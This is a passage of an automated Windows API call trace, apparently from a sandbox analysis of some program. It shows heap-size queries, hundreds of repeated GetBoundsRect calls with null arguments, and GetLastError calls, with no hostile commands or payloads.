(lpTopLevelExceptionFilter=0x4088ff) returned 0x0 [0069.895] RtlSizeHeap (HeapHandle=0x9d0000, Flags=0x0, MemoryPointer=0x9d2a60) returned 0x80 [0069.896] RtlSizeHeap (HeapHandle=0x9d0000, Flags=0x0, MemoryPointer=0x9d2a60) returned 0x80 [0069.896] RtlSizeHeap (HeapHandle=0x9d0000, Flags=0x0, MemoryPointer=0x9d2a60) returned 0x80 [0069.897] RtlSizeHeap (HeapHandle=0x9d0000, Flags=0x0, MemoryPointer=0x9d2a60) returned 0x80 [0069.897] RtlSizeHeap (HeapHandle=0x9d0000, Flags=0x0, MemoryPointer=0x9d2a60) returned 0x80 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.898] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.899] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.900] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.901] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.902] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.903] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.904] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.905] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0069.906] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () returned 0x0 [0075.577] GetLastError () 